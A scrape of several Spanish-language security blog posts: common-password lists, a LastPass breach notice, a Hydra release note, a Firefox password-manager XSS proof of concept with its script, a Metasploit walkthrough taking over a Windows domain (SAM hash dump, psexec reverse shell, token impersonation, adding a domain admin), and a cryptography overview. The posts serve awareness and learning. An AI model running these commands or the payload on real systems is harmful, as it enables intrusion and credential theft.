Después de traerte las peores 500 contraseñas de todos los tiempos, las peores contraseñas en español y las peores contraseñas para dispositivos iOS ahora te traigo las peores contraseñas de este año, como puedes ver es muy poco lo que ha cambiado este listado en los últimos años, por lo que se mantiene la mala costumbre de utilizar estas contraseñas en la mayoría de personas.

Te dejo el listado de passwords, no sin antes recomendarte seguir los enlaces de artículos y herramientas aprender a utilizar contraseñas seguras, que te dejo después de ella:

1. password
2. 123456
3. 12345678
4. qwerty
5. abc123
6. monkey
7. 1234567
8. letmein
9. trustno1
10. dragon
11. baseball
12. 111111
13. iloveyou
14. master
15. sunshine
16. ashley
17. bailey
18. passw0rd
19. shadow
20. 123123
21. 654321
22. superman
23. qazwsx
24. michael
25. football

Si tu contraseña se encuentra en esta lista, por favor, cámbiala inmediatamente, en la comunidad dragonjar hemos proporcionado siempre información útil para maneja tus contraseñas fácilmente, herramientas para generar contraseñas seguras, para testear la seguridad de tu contraseña como esta herramienta online de Microsoft o la de password.es que incluye un generador de contraseñas seguras e incluso aplicaciones que si no quieres utilizar una palabra clave, te permiten utilizar tu rostro como contraseña.

También puede interesarte...

• Las peores Contraseñas en Español
• Cómo funcionan y se crackean las claves en sistemas Windows
• Cambia tu clave maestra en LastPass
• Las Peores 500 Contraseñas de Todos los Tiempos
• “1234″ y “password” son las Contraseñas + Utilizadas en USA
• Hydra Revive!!
• Geelbe crackeado ¡Cambia tus Claves YA!
• Robando claves por XSS del Administrador de Contraseñas del Firefox

Las personas en su afán de hacer mas cómoda su navegación por Internet, tienden a utilizar contraseñas fáciles de recordar y utilizan la misma para los sitios que mas frecuentan; Este comportamiento es tan común que sin saberlo muchas personas utilizan la misma combinación de letras y números como su contraseña, varios factores influyen en esto, como lo son la disposición del teclado, el uso de nombres comunes, hobbies, etc…

A continuación les dejo una lista de las contraseñas mas utilizadas en español, si tu contraseña se encuentra en esta lista, por favor, cámbiala de inmediato, en la comunidad hemos proporcionado siempre información útil para maneja tus contraseñas fácilmente, herramientas para generar contraseñas seguras, e incluso aplicaciones que si no quieres utilizar una palabra clave, te permiten utilizar tu rostro como contraseña.

• 123456
• 12345
• 123456789
• 12345678
• 1234567
• 111111
• Nombres Propios (alejandra, alberto, alejandro, roberto, etc..)
• Contraseña
• Tequiero
• Típicos desde los 80′s (sexo,amor,dios,dinero, muchas veces se combinan con números para cumplir el mínimo de caracteres exigido)
• Nombre de la Pagina (si la clave es de facebook, la clave será facebook, lo mismo con gmail, hotmail, etc…)
• qwerty
• 000000
• Hobby (equipos de fútbol, artistas o grupos musicales, nombres de actores o películas, etc…)
• Cédula o números celular (son muy utilizados y dan sensación de seguridad, pero esta información se puede conseguir fácilmente)
• abc123
• tequiero
• estrella
• iloveyou
• 654321
• bonita
• mariposa
• america

Para complementar esta lista, puedes ver los peores passwords de todos los tiempos y seguir las recomendaciones de seguridad que te enlazamos al principio, también puedes testear la seguridad de tu contraseña con esta herramienta online de Microsoft o la de password.es que incluye un generador de contraseñas seguras.

También puede interesarte...

• Las Peores 500 Contraseñas de Todos los Tiempos
• Cambia tu clave maestra en LastPass
• “1234″ y “password” son las Contraseñas + Utilizadas en USA
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Como Recuperar Clave MySQL
• Diccionario claves WPA para Realizar Ataques de Fuerza Bruta
• Cómo funcionan y se crackean las claves en sistemas Windows
• Diccionarios con Passwords de Sitios Expuestos

Las contraseñas han sido por muchos años la medida de seguridad por excelencia para garantizar el acceso a las personas autorizadas de un sistema, pero no todas las implementaciones en los sistemas de acceso son realizadas correctamente, es el caso de los sistemas Microsoft Windows que en su afán de conservar la compatibilidad con versiones anteriores, permiten la utilización de cifrados inseguros para las claves que utilizamos en sistemas mas actuales.

El siguiente vídeo que me envía Omar Palomino, nos enseña claramente como funciona el sistema de contraseñas en Microsoft Windows, por qué no debemos usar contraseñas con menos de 14 caracteres y veremos varios métodos para crackear el sistema de claves en entornos Windows incluyendo el uso de Rainbow Tables.

Mas Información:
A la fuerza…. por fuerza bruta!!

También puede interesarte...

• Las peores Contraseñas en Español
• Cambia tu clave maestra en LastPass
• Nueva versión de Cain & Abel
• Ophcrack con soporte para Windows Vista
• Bruter – Herramienta Para Crackear Password por Fuerza Bruta de Forma Paralela en Windows
• Las peores contraseñas de este año
• Actualiza tu software con Secunia Personal Software Inspector
• Las Peores 500 Contraseñas de Todos los Tiempos

LastPass es uno de los mejores servicios para almacenar tus contraseñas en la nube y olvidarte de tener que recordar cada una de ellas, cuenta con multiples opciones que la diferencian de las demás alternativas, como su integración con multiples navegadores y dispositivos móviles, la posibilidad de utilizar claves desechables y la seguridad que nos ofrece su infraestructura.

Pero esta seguridad ofrecida se ha puesto en duda, después que desde su blog oficial anunciaran la detección de una anomalia en el trafico de su base de datos, por lo que esperando lo peor, nos advierten de cambiar nuestra contraseña maestra cuanto antes.

En la fuga de información es posible que se filtraran los correos electrónicos y los hash de las claves, por tanto la seguridad de la información almacenada en tu cuenta depende, en gran medida de la clave maestra que utilizaras para guardarla, si es una clave que se encuentre facilmente en un diccionario, cambiala inmediatamente, si por el contrario utilizaste una clave fuerte, puedes estar un poco mas tranquilo, pero igualmente es recomendable que cambies tu clave.

Aunque la medida adoptada por LastPass es un poco paranoica, me parece bastante acertado que avisaran a sus clientes sobre esta anomalia, previniendo así un daño mayor a sus clientes si una fuga de información fué llevada a cabo.

PD. En estos momentos el cambio de contraseña esta bastante saturado, por la cantidad de personas que lo están realizando al mismo tiempo, si tu clave es debil, te recomiendo que insistas hasta que puedas cambiarla, de lo contrario puedes esperar un poco mas hasta que el servicio se normalice.

Visita LastPass.com

Mas Información:
LastPass Security Notification

También puede interesarte...

• Las peores Contraseñas en Español
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Las Peores 500 Contraseñas de Todos los Tiempos
• “1234″ y “password” son las Contraseñas + Utilizadas en USA
• ClaveHotmail.com cometiendo delitos desde el 2007
• Diccionario claves WPA para Realizar Ataques de Fuerza Bruta
• Cómo funcionan y se crackean las claves en sistemas Windows
• Recupera tu Password de FileZilla

Desde el momento en que la gente comenzó a utilizar contraseñas, no tardaron en darse cuenta que varias personas utilizaban la misma contraseña una y otra vez, incluso la forma en que las personas escriben erróneamente las palabras es coherente; Normalmente las personas son tan previsibles que la mayoría de los hackers hacen uso de listas de contraseñas comunes como las publicadas en este articulo.

Actualizado:
Recientemente la red de sitios Gawker Media, dueños de algunos de los portales de tecnología mas visitados en la red, como lifehacker o Gizmodo fueron vulnerados y su base de datos publicada en internet, junto con la información en texto plano de la información personal ingresada por sus usuarios, la siguiente tabla muestra una vez mas como el usuario promedio sigue usando las mismas claves una y otra vez, aunque se les advierta que hacen parte de las peores contraseñas de todos los tiempos.

Para darle una idea de cómo los seres humanos son predecibles, la siguiente es una lista de las 500 contraseñas más comunes. Tenga en cuenta que cada contraseña que figuran aquí se ha utilizado por lo menos cientos si no miles de veces por otras personas.

“Aproximadamente uno de cada nueve personas por lo menos utiliza una contraseña en la lista, Y uno de cada 50 personas utiliza una de las 20 primeras peores contraseñas”.

Hay algunas claves interesantes en esta lista que muestran cómo la gente trata de ser inteligente, pero incluso el ingenio humano es predecible. Por ejemplo, mire las siguientes contraseñas:

• ncc1701 El buque número ncc1701 de Starship Enterprise
• thx1138 El nombre de la primera película de George Lucas
• qazwsx un simple patrón de los teclados QWERTY
• 666666 el números seis, seis veces
• 7777777 siete sietes
• ou812 El título de un álbum de Van Halen 1988

Si usted observa que su contraseña se encuentra en esta lista, por favor, cámbiela de inmediato, en la comunidad hemos proporcionado siempre información útil para maneja tus contraseñas fácilmente, herramientas para generar contraseñas seguras, e incluso aplicaciones que si no quieres utilizar una palabra clave, te permiten utilizar tu rostro como contraseña.

También puede interesarte...

• Las peores Contraseñas en Español
• “1234″ y “password” son las Contraseñas + Utilizadas en USA
• Cambia tu clave maestra en LastPass
• Como Recuperar Clave MySQL
• Robando claves por XSS del Administrador de Contraseñas del Firefox
• Bits y Qubits, El camino de la criptografía – Parte I
• CeWL – Generador de Diccionarios Personalizados
• ClaveHotmail.com cometiendo delitos desde el 2007

Hydra es una excelente herramienta para realizar testeo de contraseñas en servicios por medio de la fuerza bruta, lastimosamente la herramienta parecía abandonada y muchas personas recomendaban algunas alternativas como medusa, mas actualizada por sus autores.

Afortunadamente The Hacker’s Choice ha publicado una nueva versión de esta excelente herramienta que ademas permitir testear la seguridad de las contraseñas en los siguientes servicios:

• TELNET
• FTP
• HTTP
• HTTPS
• HTTP-PROXY
• SMB
• SMBNT
• MS-SQL
• MYSQL
• REXEC
• RSH
• RLOGIN
• CVS
• SNMP
• SMTP-AUTH
• SOCKS5
• VNC
• POP3
• IMAP
• NNTP
• PCNFS
• ICQ
• SAP/R3
• LDAP2
• LDAP3
• Postgres
• Teamspeak
• Cisco auth
• Cisco enable
• LDAP2
• Cisco AAA

También incluyen muchas novedades,  comentaremos las mas importantes:

• Ahora hydra esta licenciada bajo GPL v3
• Nuevo soporte para autenticación  SIP MD5
• No hay mas soporte para Palm, ARM y Windows (al parecer causaba muchos dolores de cabeza a su autor)
• Algunas mejoras en el modulo SSH2
• Muchos bugs solucionados.

Si quieres ver el listado de cambios completo, puedes visitar la pagina oficial del proyecto Hydra.

Espero que sigan actualizando mas seguido esta herramienta y no la dejen morir ya que aunque existen muchas alternativas, Hydra siempre tiene un rincón especial en mi kit de herramientas.

También puede interesarte...

• Nueva versión de Cain & Abel
• X5S – Encuentra fallos XSS, LFI y RFI fácilmente
• Video: Ataque de envenenamiento de cookies (Cookie-Poisoning)
• CeWL – Generador de Diccionarios Personalizados
• ¿Como Eliminar la Contraseña de un PDF?
• Crackear redes inalámbricas desde el iPhone o iPod Touch
• Curso Completo de Metasploit Framework
• Las peores contraseñas de este año

Pero ademas de estos descuentos, ahora su usuarios también recibirán una gran sorpresa si utilizan la misma combinación de usuario:contraseña que en este servicio, ya que se ha filtrado en internet la base de usuarios y contraseñas de todos los usuarios de este servicio, por lo que es mas que recomendable que si utilizas normalmente la misma clave para otros servicios.. CAMBIA INMEDIATAMENTE LAS CONTRASEÑAS para evitar que estos otros servicios caigan en manos de personas mal intencionadas o simples curiosos.

Al parecer este servicio en el que han invertido mas de 30 millones de dolares, utilizaba un cifrado demasiado débil (base64) para “codificar” las claves de sus usuarios, lo que facilitó a el atacante conseguir y publicar las contraseñas en texto plano.

Otra razón mas para NO UTILIZAR LA MISMA CONTRASEÑA en mas de un servicio web, de momento no hay un comunicado oficial, tan pronto sea publicado actualizaremos la entrada para dárselos a conocer.

También puede interesarte...

• Bits y Qubits, El camino de la criptografía – Parte I
• Las peores contraseñas de este año
• Las peores Contraseñas en Español
• Cómo funcionan y se crackean las claves en sistemas Windows
• Cambia tu clave maestra en LastPass
• Las Peores 500 Contraseñas de Todos los Tiempos
• Hydra Revive!!
• Tus busquedas en Google ahora Cifradas

El problema se encuentra en que el administrador de contraseñas del Mozilla Firefox , no valida adecuadamente el formulario desde el cual se guarda la clave en el administrador de contraseñas, por lo tanto si a la pagina donde se encuentra el formulario de logueo se le puede realizar un XSS es posible agregar un formulario con un campo oculto del tipo “password” y al acceder a ella, firefox no solo llenara el formulario real de acceso automáticamente, sino también el formulario oculto que acabamos de inyectar.

Si le echamos un vistoso al formulario utilizando el plugin Web Developer para el Mozilla Firefox, encontramos que efectivamente el Administrador de Contraseñas, nos llenó el formulario oculto que colocamos en la pagina mediante XSS con nuestra clave de acceso:

El código utilizado para robar la información del Administrador de contraseñas en el Mozilla Firefox:

<script> document.write('<form><input id=p type=password style=visibility:hidden></form>'); setTimeout('alert("Password: " + document.getElementById("p").value)', 100); </script>

Podemos modificar el formulario para que nos envié la contraseña capturada a un archivo en el que puede ser almacenada o enviada por correo electrónico, pero en esta prueba de concepto no lo realizaremos.

En este caso contar con “clave maestra” en el administrador de contraseñas del Mozilla Firefox no supone una “barrera” para que obtengan nuestras claves, ya que una vez ingresada la clave maestra, el Firefox llenara de todas formas el formulario con nuestra clave.

Aunque posiblemente una técnica similar pueda funcionar en otros navegadores, he realizado pruebas en Google Chrome, Safari y Opera siendo el Mozilla Firefox el único afectado.

Actualización:
Un fallo similar fue reportado en el 2006 y supuestamente fue resuelto “VERIFIED FIXED”, pero acabo de probar con la prueba de concepto que publicaron en esa ocasión y sigue siendo vulnerable.

Recomendaciones:

• Escribe “about:config” en la barra del Firefox para desactivar (poner en “false”) la función signon.autofillForms



Con esto deshabilitas la función de auto llenado del administrador de contraseñas y evitarnos ser victimas de este fallo.

• Utilizar el plugin NoScript (si no hay inyección de código, no hay problema)
• No utilizar el Administrador de Contraseñas de Mozilla Firefox (ya hemos demostrado que no es recomendable, ni en firefox, ni en ningún navegador), en vez de el utilizar servicios gratuitos como LastPass (al que por cierto le debo un articulo entero)

Mas Información:
XSS demo for stealing passwords from the Firefox password manager

También puede interesarte...

• Cambia tu clave maestra en LastPass
• ¿Cómo Recuperar una Cuenta de Twitter?
• ¿Cómo Recuperar una Cuenta de Facebook?
• Las peores Contraseñas en Español
• ClaveHotmail.com cometiendo delitos desde el 2007
• Diccionario claves WPA para Realizar Ataques de Fuerza Bruta
• Recupera tu Password de FileZilla
• Diccionarios con Passwords de Sitios Expuestos

En el siguiente video vamos a ver como  tomar el control de un dominio en windows, cuando se presenta el caso de Reutilización de contraseñas comentado anteriormente:

REQUISITOS

• Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario)
• Todos los usuarios “administrador” de las maquinas miembros del dominio tienen la misma clave
• Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social)
• Una copia de BackTrack 4

Teniendo los requisitos listo, pasamos a realizar los pasos para tomar el control de un dominio en Windows:

Como vemos, fácilmente hemos agregado un usuario administrador a la lista de “administradores de dominio” simplemente siguiendo estos pasos:

• mount /dev/sda1 /mnt/sda1
  Montamos la particion de la maquina windows
• cd /mnt/sda1/WINDOWS/system32/config
  accedemos a la carpeta dodne se encuentra el archivo SAM
• samdump2 system SAM
  sacamos los hash de los usuarios en la maquina windows
• msfconsole
  ejecutamos el metasploit por consola
• use windows/smb/psexec
  utilizamos el psexec
• exploit -p windows/meterpreter/reverse_tcp -o
  utilizamos la shell meterpreter
• LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,SMBPass= 123…:5654… -j
  configuramos las opciones del exploit
• sessions -i 1
  una vez aparezca exitoso el ataque lanzamos la sesión donde se encuentra
• use incognito
  utilizamos el modulo incognito de meterpreter
• list_tokens -u
  mostramos los tokens
• impersonate_token mydomain\\domainadmin
  tomamos las credenciales del administrador de dominio
• execute -f cmd.exe -i -t
  lanzamos la consola de windows
• net user hack MPass5678 /add /domain
  Agregamos el usuario “hack” con clave “MPass46782″ al dominio
• net group “Domain Admins” hack /add /domain
  metemos el usuario hack al grupo de administradores de dominio
• Ya hemos tomado el control del dominio de windows

Este ataque es compatible con  WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseñas en nuestro sistema, sin importar que tan “complejas” sean.

PD. en Securitytube.net existe un vídeo en el que realizan este mismo procedimiento un poco mas “a mano” pero que puede servirnos también en nuestro proceso de aprendizaje.

También puede interesarte...

• Katana 2.0 Múltiples Distribuciones de Seguridad en tu USB
• Bypass con Metasploit: atacando a nuestro objetivo desde una maquina ya comprometida
• Katana – Múltiples Distribuciones de Seguridad en tu USB
• Curso Completo de Metasploit Framework
• winAUTOPWN – Ataques automáticos de entornos Windows
• Así fue el Hacking Day en Medellín – Pentesting con Backtrack
• Cómo funcionan y se crackean las claves en sistemas Windows
• BackTrack 5

Hasta el siglo XIX las sustituciones y transposiciones constituían las técnicas más comunes para ocultar mensajes a compartir,  mismas que eran confiables hasta que alguien lograba descubrir su funcionamiento (o algoritmo). Actualmente en cambio, se aplican las matemáticas como base fundamental de la criptografía, aportando un nivel de seguridad evidentemente mucho más elevado en donde los algoritmos incluso son conocidos por el público. De hecho el alemán Auguste Kerckhoffs3, planteó un principio en el que argumenta que “la fortaleza de un cifrador está en la fortaleza de su llave y no en cuán secreto sea su algoritmo”, valiosa lección que fue comprobada con sangre por sus compatriotas derrotados en la segunda guerra mundial, que se comunicaban con máquinas que cifraban las comunicaciones (como la Enigma4) cuyo diseño era evidentemente secreto, mecanismo que fue realmente efectivo hasta que el inglés Alan Turing5 (quien sentó las bases de la computación moderna) logró descifrar sus transmisiones en uno de los casos de criptoanálisis más memorables, evidenciando que el esfuerzo de mantener secreto un algoritmo de cifrado es inútil y que la seguridad del mismo recae directamente en la dificultad para descifrar su clave.

Siguiendo el principio de Kerckhoffs un gran número de diseños de cifradores actuales son abiertos y utilizan claves tan fuertes que podría tardarse años (cientos o miles) intentando descifrarlas con la capacidad de cómputo actual, aspecto que será revaluado al final del documento.

Teniendo ahora una somera visión del camino de la criptografía hasta nuestros días, es importante mencionar de forma muy breve algunas de sus aplicaciones.

Bases de Datos

Los motores de bases de datos incluyen algoritmos criptográficos dentro de  su abanico de funciones, cuya implementación en sistemas de información es muy recomendable, evitando codificarlos o reusar código fuente de terceros.

Comunicaciones en Internet

TLS v1.2 es un protocolo derivado de SSL que provee comunicaciones seguras a través de la Internet, previniendo eavesdropping, tampering o message forgery. Una gran ventaja del protocolo es su capacidad de encapsular datos de capa de aplicación, ofreciendo transparencia en el desarrollo e implementación de aplicaciones, así como servir de plataforma de seguridad para protocolos (de capa superior) como HTTP, SMTP, NNTP o SIP.
TLS ofrece confidencialidad mediante criptografía simétrica, cifrando los datos con diferentes llaves para cada conexión, integridad utilizando funciones de hashing y autenticación mediante el uso de algoritmos de llave
pública.

Autenticación: Kerberos

Protocolo de autenticación que permite validar identidades de participantes durante un intercambio de mensajes, fue desarrollado por el MIT con base en el paper de Needmham y Schroeder de1978.

Su funcionamiento requiere un servidor central contra el cual los usuarios deben autenticarse primero, conocido como Key Distribution Center (KDC). Una vez se ha validado su identidad, se le entrega al usuario un ticket de sesión que utilizará para autenticarse contra los demás servidores que “confían” plenamente en el KDC y sólo aceptan solicitudes de cualquier usuario que se identifique con un ticket de sesión, mismo que  podrá ser reutilizado en diferentes servidores hasta que termine su tiempo de expiración. Kerberos constituye uno de los mecanismos más seguros de autenticación además de proveer una solución robusta de single sign-on.

La última versión, Kerberos 5, permite utilizar una gran cantidad de algoritmos criptográficos simétricos, asimétricos y de hashing, que implementa mayoritariamente de forma híbrida (por ejemplo 3DES-CBC-SHA1).

GnuPG

Herramienta de línea de comandos que implementa el protocolo OpenPGP (que a su vez usa PGP 5 como base), que permite ofrecer confidencialidad, administración de llaves, autenticación y firmas  digitales, mediante la  combinación del uso de criptografía simétrica y de llave pública.

P2P: MSE

El Message Stream Encryption (MSE) es un protocolo de cifrado utilizado en gran parte de la red torrent (y otros protocolos P2P), que sirve de envoltura a los flujos de datos y los protege de ser detectados como tráfico torrent, evitando así su filtrado por parte de terceros (como ISPs). De igual forma se consideró durante su diseño que MSE ofreciera protección en contra de eavesdroping y ataques man-in-the-middle.
MSE utiliza Diffie-Hellman para acordar la llave secreta, SHA-1 como función de hashing y RC4 para cifrar la comunicación debido a su
seguridad y velocidad (razón por la cual fue elegido en lugar de AES). Es importante aclarar que el objetivo del protocolo es “aleatorizar” el flujo de datos sin garantizar su integridad o la autenticación de los peers.

Wi-Fi

Tres diferentes protocolos permiten a un usuario conectarse a una red inalámbrica: WEP, WPA y WPA2.
A pesar de ser el más utilizado, WEP presenta vulnerabilidades serias debido principalmente a una deficiente alimentación del cifrador RC4. Fue
tan grave este error que se decidió generar un nuevo protocolo de comunicaciones wi-fi que reemplazara a WEP, así apareció WPA que utiliza
de una forma más adecuada a RC4 e incluye dos nuevos protocolos: TKIP (Temporal Key Integrity Protocol), que genera llaves diferentes para cada
sesión de usuario, y EAP (Extensible Authentication Protocol) que permite autenticar clientes de forma segura utilizando un servidor tipo RADIUS,
características que solucionan gran parte de los problemas de WEP. Sin embargo el protocolo wi-fi más seguro es WPA2, que incluye las
características de WPA y reemplaza a RC4 por AES, incrementando así en mayor medida la seguridad de la conexión.

Celular: GSM-EDGE-GPRS

La transmisión de voz vía GSM o EDGE desde el handset del usuario hasta la antena de la estación es cifrada mediante el algoritmo A5/3, mientras que GPRS utilliza GEA3. Ambos son cifradores de flujos que utilizan el cifrador de bloque Kasumi en modo OFB (output feedback) que les sirve como generador pseudoaleatorio.

Mensajería Instantánea

La mensajería instantánea es una actividad convertida en costumbre para un gran número de internautas, que desconocen que la mayoría de clientes de
IM que utilizan transmiten todas sus conversaciones en texto claro, de hecho usuarios poco experimentados comparten información sensible por
este medio de comunicación sin saber los riesgos que están corriendo.
Existe una comparación de diferentes características de clientes de mensajería instantánea en wikipedia:

http://en.wikipedia.org/wiki/Comparison_of_instant_messaging_clients

Evidentemente la criptografía se encuentra presente en algunas de nuestras actividades diarias, y poco (o nada) sabemos acerca de qué tipo de  algoritmos criptográficos se utilizan en cada una de ellas, imposibilitándonos entender qué tan seguros o vulnerables nos encontramos. Así como en los cuadros anteriores, existen muchas más aplicaciones de la criptografía, como transmisión de televisión (y su respectiva restricción de canales premium),
transmisión de señales satelitales, telefonía celular, creación de contraseñas, e-commerce, comunicaciones militares, bluetooth, VPN, etc. Es importante conocer cómo las aplicaciones o dispositivos con que interactuamos cotidianamente transmiten nuestra información, no sólo qué algoritmos implementan, sino también el tamaño de las claves que utilizan, porque según el principio de Kerckhoffs, en la fortaleza de la llave reside realmente la seguridad de la información transmitida.

El número de bits de la llave o del hash, dependiendo del caso, es un tema realmente crítico en criptografía que debe ser evaluado cuidadosamente por el profesional encargado de seguridad, afortunadamente existen recomendaciones útiles como apoyo técnico en este sentido que pueden ser consultadas en www.keylength.com.

Para terminar de hablar de criptografía moderna, el siguiente cuadro sugiere los algoritmos recomendables a implementar en las soluciones tecnológicas de la actualidad.

Hasta aquí llega la primera parte de este articulo, en la segunda edición hablaremos sobre la criptografía cuántica, espero que les gustara este articulo y me lo hagan saber con sus comentarios.

Otras partes del Articulo:

• Bits y Qubits, El camino de la criptografía – Parte I
• Bits y Qubits, El camino de la criptografía – Parte II

Este articulo fue escrito por Anaxmon para La Comunidad DragonJAR, tú también puedes enviar tus artículos para publicarlos en la comunidad, como ya lo hicieron Axiacamus, Eduardo Restrepo,, Epsilon, 4v4t4r, Cortex, Cronopio, D7n0s4ur70, Laura JAR y SamuraiBlanco; Solo tienes que enviar tu articulo a dragon(arroba)dragonjar.org.

También puede interesarte...

• Crackear redes inalambricas con WPA en 1 Minuto
• Las peores Contraseñas en Español
• Las Peores 500 Contraseñas de Todos los Tiempos
• Tus busquedas en Google ahora Cifradas
• Kits de crackeo wireless en china
• WiBOG – Wireless Bogotá
• Geelbe crackeado ¡Cambia tus Claves YA!
• Fallo en OpenSSL permite obtener clave privada